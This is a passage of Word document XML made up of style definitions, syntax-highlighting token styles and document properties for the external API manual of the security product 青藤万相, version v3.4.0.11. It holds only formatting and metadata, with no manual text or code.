    <w:name w:val="Source Code 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="SourceCode"/>
    <w:rsid w:val="000833CF"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007955E6"/>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caption"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007955E6"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007955E6"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af">
    <w:name w:val="表标题"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af0"/>
    <w:qFormat/>
    <w:rsid w:val="00E21ABB"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="22"/>
    <w:rsid w:val="00A6373E"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:caps w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:vanish w:val="0"/>
      <w:sz w:val="28"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="表标题 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="af"/>
    <w:rsid w:val="00E21ABB"/>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="思源黑体 CN Normal" w:hAnsi="Roboto"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af2">
    <w:name w:val="强调内容"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af3"/>
    <w:qFormat/>
    <w:rsid w:val="009103FA"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="有序列表"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af4"/>
    <w:qFormat/>
    <w:rsid w:val="00F60976"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:leftChars="200" w:left="620"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="强调内容 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="af2"/>
    <w:rsid w:val="009103FA"/>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="思源黑体 CN Normal" w:hAnsi="Roboto"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a2">
    <w:name w:val="无序列表"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af5"/>
    <w:qFormat/>
    <w:rsid w:val="007B6AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:leftChars="200" w:left="620"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="列表段落 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F60976"/>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="有序列表 字符"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="a"/>
    <w:rsid w:val="00F60976"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5620"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="420"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10181"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="无序列表 字符"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="a2"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A156E"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B1F9E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="无序表二"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af7"/>
    <w:qFormat/>
    <w:rsid w:val="007B6AF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:leftChars="400" w:left="820"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="有序表二"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af8"/>
    <w:qFormat/>
    <w:rsid w:val="006B2C9F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:leftChars="400" w:left="820"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af7">
    <w:name w:val="无序表二 字符"/>
    <w:basedOn w:val="af5"/>
    <w:link w:val="a1"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af8">
    <w:name w:val="有序表二 字符"/>
    <w:basedOn w:val="af4"/>
    <w:link w:val="a0"/>
    <w:rsid w:val="006B2C9F"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009B25D9"/>
    <w:rPr>
      <w:rFonts w:eastAsia="微软雅黑"/>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rPr>
        <w:rFonts w:eastAsia="微软雅黑"/>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="00A4C5"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005A156E"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="思源黑体 CN Normal" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5620"/>
    <w:pPr>
      <w:ind w:leftChars="800" w:left="1680"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af9">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0014057C"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
    <w:name w:val="KeywordTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DataTypeTok">
    <w:name w:val="DataTypeTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
    <w:name w:val="DecValTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BaseNTok">
    <w:name w:val="BaseNTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FloatTok">
    <w:name w:val="FloatTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ConstantTok">
    <w:name w:val="ConstantTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
    <w:name w:val="CharTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
    <w:name w:val="SpecialCharTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
    <w:name w:val="StringTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimStringTok">
    <w:name w:val="VerbatimStringTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
    <w:name w:val="SpecialStringTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportTok">
    <w:name w:val="ImportTok"/>
    <w:rsid w:val="00BC669E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
    <w:name w:val="CommentTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentationTok">
    <w:name w:val="DocumentationTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AnnotationTok">
    <w:name w:val="AnnotationTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentVarTok">
    <w:name w:val="CommentVarTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
    <w:name w:val="OtherTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
    <w:name w:val="FunctionTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VariableTok">
    <w:name w:val="VariableTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
    <w:name w:val="ControlFlowTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="OperatorTok">
    <w:name w:val="OperatorTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
    <w:name w:val="BuiltInTok"/>
    <w:rsid w:val="00BC669E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:rsid w:val="00BC669E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PreprocessorTok">
    <w:name w:val="PreprocessorTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
    <w:name w:val="AttributeTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="RegionMarkerTok">
    <w:name w:val="RegionMarkerTok"/>
    <w:rsid w:val="00BC669E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InformationTok">
    <w:name w:val="InformationTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WarningTok">
    <w:name w:val="WarningTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AlertTok">
    <w:name w:val="AlertTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
    <w:name w:val="ErrorTok"/>
    <w:rsid w:val="00BC669E"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
    <w:name w:val="NormalTok"/>
    <w:rsid w:val="00BC669E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00506C5C"/>
    <w:pPr>
      <w:ind w:leftChars="1000" w:left="2100"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00506C5C"/>
    <w:pPr>
      <w:ind w:leftChars="1200" w:left="2520"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00506C5C"/>
    <w:pPr>
      <w:ind w:leftChars="1400" w:left="2940"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00506C5C"/>
    <w:pPr>
      <w:ind w:leftChars="1600" w:left="3360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00506C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797971">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="8531093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90D24-AACD-4ED3-BFA3-93CDAF913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32</TotalTime>
  <Pages>499</Pages>
  <Words>47051</Words>
  <Characters>268194</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2234</Lines>
  <Paragraphs>629</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>31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xiang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>long xiang</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2022-01-20T06:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-23T06:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-04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产品名称">
    <vt:lpwstr>青藤万相</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="手册名称">
    <vt:lpwstr>外部API手册</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="日期">
    <vt:lpwstr>2022.09</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="版本号">
    <vt:lpwstr>v3.4.0.11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="文档密级">
    <vt:lpwstr>密级：公开</vt:lpwstr>
  </property>
</Properties>
</file>